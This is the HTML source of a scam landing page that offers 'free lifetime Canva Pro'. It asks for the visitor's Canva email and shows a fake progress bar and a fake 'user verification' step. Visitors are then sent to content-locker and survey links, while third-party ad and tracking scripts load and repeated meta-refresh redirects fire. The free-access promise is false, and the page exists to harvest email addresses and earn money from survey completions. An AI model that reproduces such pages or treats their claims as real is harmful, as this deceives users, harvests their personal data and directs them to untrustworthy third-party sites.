<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
	<meta name="monetag" content="508d22d57026c880cf7f650df452b3a1">
	<meta name="a.validate.02" content="lvihth1jwtJWfb31m-09tNKksOCXIAk16iB3" />
	<meta http-equiv="refresh" content="15; URL='https://canvaprofree.tech/canvaprofree.html'" />
	 <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-4200710519380728"
     crossorigin="anonymous"></script>
   
	<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-VNW9XTCESZ"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-VNW9XTCESZ');
</script>
<meta http-equiv="refresh" content="15; URL='https://canvaprofree.tech/canvaprofree.html'" />
<html lang = "en">
<meta name="robots" content=" ALL, index, follow,">
<link rel="canonical" href="https://canvaprofree.tech" />
<meta http-equiv = "content-language" content = "en">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1" />
	<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-VNW9XTCESZ"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-VNW9XTCESZ');
</script>
<link href="https://fonts.googleapis.com/css?family=Comfortaa" rel="stylesheet">
<title>Canva Pro Free | Get FREE Canva Pro for (Lifetime)</title>
<link rel="shortcut icon" type="image/png" href="img/canva.png"/>
	<link rel="apple-touch-icon" href="img/canva.png" />
<meta name="keywords" content="canva,canva pro for students, canva premium account free, canvapremium, canva premium free, canva premium account free, canva pro login, canva online, canva pro, canva pro free, canva pro pricing, canva login, canva for education, canva design, canva coupon code, canva pro for students, canva pro free trial">
<meta name="description" content="Get Canva Pro FREE for Lifetime + No Credit Card. Get Canva Premium (Personal Account) for free.You'll get Canva Pro account vesy fast and easily.">
<meta tag="canva free, free canva, canva trial, canva pro pricing, canva pro mod apk, canva pro, canva pro for free, canva pro free, free canva pro, canva pro account free,canva pro download
free canva pro, canva pro free download, download canva premium, free canva pro for students,canva premium account,canva premium account free, canva trial, 
canva pro free for lifetime, ">
<script src="js/jscript.js"></script>
<script type="text/javascript">
    var CPABUILDSETTINGS={"it":2700945,"key":"d0faf"};
</script>
<script src="../../dby7kx9z9yzse.cloudfront.net/d966fa0.js"></script>
<!--<script type="text/javascript" id="ogjs" src="https://www.locked4.com/cl/load.php?id=b42e4f3aebd89f7c93b3f7d274573dd7"></script>-->
</head>

<style>

html {
    background: url("img/lootboxbg.jpg") no-repeat center center fixed;
    background-size: cover;
}

body {
    text-align: center;
    font-family: 'Comfortaa', cursive;
}

img {
    display: block;
    margin-left: auto;
    margin-right: auto;
}

.form-option {
    margin-left: 15px;
    margin-right: 30px;
    margin-bottom: 15px;
}

.input-form {
    background-color: #fff;
    background-image: none;
    border: 1px solid #ccc;
    border-radius: 4px;
    box-shadow: 0 1px 1px rgba(0, 0, 0, 0.075) inset;
    color: black;
    display: block;
    font-size: 14px;
    height: 20px;
    line-height: 1.42857;
    padding: 6px 12px;
    transition: border-color 0.15s ease-in-out 0s, box-shadow 0.15s ease-in-out 0s;
    vertical-align: middle;
    width: 100%;
}

.input-form::-moz-placeholder {
    color: #999;
    opacity: 55;
}

.input-command {
    border-radius: 6px;
    font-size: 18px;
    height: 28px;
    line-height: 1.33;
    padding: 10px 16px;
}

select.input-command {
    height: 46px;
    line-height: 46px;
}

.wrapper {
    padding: 0;
    margin: -136px auto 0;
}

.wrapper img {
    width: 60%;
}

.lootbox1 {
    background: url("img/canva.png" alt"canva pro" title"canva pro") no-repeat scroll 10px center white;
    padding-left: 40px !important;
}

.buttonstyle {
    border-radius: 6px;
    background-color: #111c30;
    border: none;
    color: white;
    padding: 16px 33px;
    font-size: 33px;
    display: inline;
    height: 72px !important;
    box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
}

.btn-yellow {
    -webkit-transition: background-color .3s ease;
    -o-transition: background-color .3s ease;
    transition: background-color .3s ease;
    font-family: BurbankBigCondensed-Black, sans-serif;
    font-size: 24px;
    letter-spacing: 1px;
    text-transform: uppercase;
    border-radius: 0px;
    padding-top: 10px;
    padding-left: 19px;
    padding-right: 19px;
    background-color: #f0ed63;
    color: #000;
}

.btn-yellow:hover {
    color: #000;
    background: #ECE834;
}

#progressbarouter {

}

#progressbarcontainer {
    display: none;
    border-radius: 6px;
    position: relative;
    border: 6px solid black;
    margin-left: auto;
    margin-right: auto;
    width: 90%;
    height: 50px;
    box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
}

#progressbar {
    position: absolute;
    width: 10%;
    height: 100%;
    background-color: #fdd633;
}

#progressbarlabel {
    line-height: 54px;
    text-align: center;
    color: black;
}

#main-tool{
    background: #efefef; /* Old browsers */
    background: -moz-linear-gradient(top,  #868f99 0%, #efefef 80px); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#868f99), color-stop(80px,#efefef)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #868f99 0%,#efefef 80px); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #868f99 0%,#efefef 80px); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #868f99 0%,#efefef 80px); /* IE10+ */
    background: linear-gradient(to bottom,  #868f99 0%,#efefef 80px); /* W3C */
    filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#868f99', endColorstr='#efefef',GradientType=0 ); /* IE6-9 */
    border-radius: 10px;
    max-width: 500px;
    margin: 20px auto 5px;
    padding: 50px;
    opacity: 0.9;
}

#shield{
    margin-bottom: 5px;
}

#verifybg {
    height: 0%;
    width: 100%;
    left: 0;
    top: 0;
    position: fixed;
    z-index: 1;
    overflow-x: hidden;
    transition: 0.5s;
    background-color: rgb(0,0,0);
    background-color: rgba(0,0,0, 0.3);
}

#verify {
    margin-left: auto;
    margin-right: auto;
    border-radius: 10px;
    color: white;
    position: relative;
    background-color: #212835;
    box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
    width: 80%;
}

#verifycontent {
    margin-left: auto;
    margin-right: auto;
    width: 80%;
}

@media screen and (min-width: 1200px) {
        #mobileverify {
            display: none;
        }

        #desktopverify {
            display: block;
        }

        #verify {
            width: 30%;
        }
}

@media screen and (max-width: 1199px) {
        #mobileverify {
            display: block;
        }

        #desktopverify {
            display: none;
        }

        #verify {
            width: 90%;
        }
}

</style>
<body>
	
	
<!--<script src="//www.clickfam.com/captchalocker/js/captcha.js.php?id=54c603545bd02042b55ed57738f659bf"></script>-->
<div id="verifybg">
	<br>
	<br>
	<br>
	<div id="verify">
		<br>
		<br>
		<br>
		<div id="verifycontent">
			<h2>GET FREE CANVA PRO</h3>

		<div id="mobileverify">
			<p>Get Your Canva Pro For Free For Lifetime. </p>
			
			<center><b>Congratulations!</b></center>
			<!--<center><b>Step - 1</b></center>
			<center>Like Our Video And Subscribe to Our Youtube Channel</center><br>
			<center><a href="http://hyperurl.co/778g4z" rel="nofollow" target="blank"><img src="img/like.png" style="width:60px;height:17px;" alt="Youtube Like"/></a> | <a href="http://hyperurl.co/q2hgub" rel="nofollow" target="blank"><img src="img/sub.png" style="width:60px;height:17px;" alt="Youtube Subscribe"/></a></center><br>
			<center><b>Step - 2</b></center>
			<center>Please Make a Positive Comment On Our Video.</center><br>
			<center><a href="http://hyperurl.co/778g4z" rel="nofollow" target="blank"><img src="img/comment.png" style="width:60px;height:17px;" alt="Youtube Comment"/></a></center><br>
			<center><b>Step - 3</b></center>-->
			<center>ALL Done Click The Verify Button and get your canva pro free.</center><br>
			
				<!--<center><div data-captcha-enable="true"></div></center>-->
			<img style="cursor:pointer;" src="img/button_verify.png" width="80%" onclick="tundrafile.com/1253453" alt="Click here to Get Canva Pro FREE">
			
			<!--<br><center><b>Confused? Watch This Video Tutorial in Detail</b></center><br><br>
			<div class="iframe-container">
			<center><iframe width="560" height="315" src="https://www.youtube.com/embed/3z4hA7M3FTg?start=134" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center><br>--></div>
			
			
			
					</div>

			<div id="desktopverify">
			<p>Please finish the verification process to keep our software safe from automatic bot detection.</p>
			
			<center><b>Get FREE CANVA PREMIUM?</b></center>
			<!--<center><b>Step - 1</b></center>
			<center>Like Our Video And Subscribe to Our Youtube Channel</center><br>
			<center><a href="http://hyperurl.co/778g4z" rel="nofollow" target="blank"><img src="img/like.png" style="width:60px;height:17px;" alt="Youtube Like"/></a> | <a href="http://hyperurl.co/q2hgub" rel="nofollow" target="blank"><img src="img/sub.png" style="width:60px;height:17px;" alt="Youtube Subscribe"/></a></center><br>
			<center><b>Step - 2</b></center>
			<center>Please Make a Positive Comment On Our Video.</center><br>
			<center><a href="http://hyperurl.co/778g4z" rel="nofollow" target="blank"><img src="img/comment.png" style="width:60px;height:17px;" alt="Youtube Comment"/></a></center><br>
			<center><b>Step - 3</b></center>-->
			<center>To instantly obtain access to Canva Premium, simply tap the Verify button and enjoy canva pro free.</center><br>


			<!--<center><div data-captcha-enable="true"></div></center>
			<br>-->
            <a href="https://optilinklock.com/1269872" target="_blank">
			<img style="cursor:pointer;" src="img/button_verify.png" width="80%" onclick="https://optilinklock.com/1269872" alt="Click Here To Get Canva Pro FREE"></a><br><br>
			
			<!--<center><b>Confused? Watch This Video Tutorial in Detail</b></center></b></b><br><br>
			<br><div class="iframe-container">
			<center><iframe width="560" height="315" src="https://www.youtube.com/embed/3z4hA7M3FTg?start=134" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center><br>--></div>
			
			
			</div>
		</div>
		<br>
		<br>
		<br>
	</div>
</div>
	
<div id="main-tool">
<div class="wrapper"><a href="https://canvaprofree.tech" target="_blank"><img src="img/canva-pro-logo.png" alt=" free canva pro" title="Canva pro FREE logo"/></a></div>
<h1>How to Get Canva Pro for FREE Lifetime + No Credit Card</h1><br>
<p>You may need Canva Pro content at some point. Here's how to get Canva Pro (Premium) for free. Fast and easy to Get for lifetime Canva Pro account. 
<b><br>Follow these steps to access a free Canva pro.</b></p><br>
<p><i>Stap 1 :</i> Click The Button Bellow  and Create a New Canva Account.</p>
<a href="https://partner.canva.com/5b3W1b" target="_blank"  onmouseout="this.style.background='red'" onmouseover="this.style.background='#e30202'" style="background: red; border-radius: 6px; color: white; display: inline-block; font-size: 15px; font-weight: 500; margin: 15px 30px; padding: 14px 0px; text-decoration: none; transition: all 0.2s linear 0s; width: 250px;">&nbsp;CREATE CANVA ACCOUNT</a>
<p><i>Stap 2 :</i> Enter Your Canva Email Address Or Username/user ID!</p>
<div id="progressbarcontainer">
	<div id="progressbar">
		<div id="progressbarlabel">0%</div>
	</div>
</div>

<p><div id="progresslog"></div></p>

<div id="fillup">
<div class="form-option">
	<input id="username" maxlength="30" class="input-form input-command" type="email" required pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,4}$" placeholder="Canva Email">
</div>
<div class="form-option">
<p><b>Choose Your Device OS.</b></p>
<select id="device" class="input-form input-command" type="text">
<option>PC</option>
	<option>MAC</option>
		<option>iOS</option>
	<option>Android</option>
</select>
</div>
<div class="form-option">
<p><b>Select the Duration of Canva Pro Access.</b></p>
<select id="lootbox1" class="input-form lootbox1 input-command">
	<option value="$99">1 Month</option>
	<option value="$99">10 Months</option>
	<option value="$999">LifeTime!</option>
	<!--<option value="99999">9999</option>
	<option value="999999">99999</option>-->
</select>
</div>
<!-- <button onclick="move()" class="buttonstyle">GET CANVA PRO</button> -->
<ol>
    <div class="buttons" style="border-radius: 6px; font-size: 15px; text-align: center;">
        <a class="fa fa-youtube-play" href="#" id="btn_yt" onclick="show()" onmouseout="this.style.background='red'" onmouseover="this.style.background='#e30202'" style="background: rgb(38, 24, 238); border-radius: 6px; color: white; display: inline-block; font-size: 15px; font-weight: 500; margin: 15px 30px; padding: 14px 0px; text-decoration: none; transition: all 0.2s linear 0s; width: 250px;">&nbsp;Complete survey</a>
    <div style="margin: auto;"> 
        <button onclick="move()" id="yt" onmouseout="this.style.background='red'" onmouseover="this.style.background='#135B0A'" style="background-color: rgb(74, 134, 247); border-radius: 6px; color: white; display: none; font-size: 15px; font-weight: 500; margin: 15px 30px; padding: 14px 0px; text-decoration: none; transition: all 0.2s linear 0s; width: 250px;">GET FREE CANVA PROO</button> 
        <a class="fa fa-download" href="#" id="ytv" style="background-color: rgb(120, 109, 218); border-radius: 6px; color: white; display: none; font-size: 15px; font-weight: 500; margin: 15px 30px; padding: 14px 0px; text-decoration: none; transition: all 0.2s linear 0s; width: 250px;">&nbsp;Checking you subscribe or not...</a>
    </div>
      </div>
 
	<!--Start Youtube subcribe javascript-->
	
    <script type="text/javascript">
      
    </script>
    <script type="text/javascript"> 
      document.getElementById("yt").style.display = "none";
      document.getElementById("ytv").style.display = "none";
      function show() {
          window.open('//thaudray.com/4/5586482');
          // sleep(3000);
          setTimeout(function () {
              document.getElementById("yt").style.display = "block";
              document.getElementById("btn_yt").style.display = "none";
              document.getElementById("ytv").style.display = "none";
          }, 10000);
          //alert();
          document.getElementById("btn_yt").style.display = "none";
          document.getElementById("ytv").style.display = "block";
      }
      
    </script> 
    <!--End Youtube subcribe javascript--> 
	<center><h4>USER VERIFICATION STEP</h4></center>
    <li>Click On The Get Started Now Button to Access The Canva Pro FREE.</li><br>
    <li>Identify Your Canva ID Or Email by entering it in username field.</li><br>
    <li>Select the device which you are currently using.</li><br>
    <li>Select the Duration of Time you Need.</li><br>
    <li>Click/Tap on "GET CANVA PRO" Button!</li><br>
    <li>LIKE + SUBSCRIBE + HIT BELL To Unlock Access</li><br>
    <li>Finish with the Final Step And You Are Done!! Login to Canva Pro to confirm the Access.</li></br>
    </ol>


<meta http-equiv="refresh" content="20; URL='https://canvaprofree.tech/canvaprofree.html'" />

<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://inklinkor.com/tag.min.js',5595602,document.body||document.documentElement)</script>
	
</div>
<h4>Copyright 2022 Canva Pro FREE</h4>
</body>
</html>

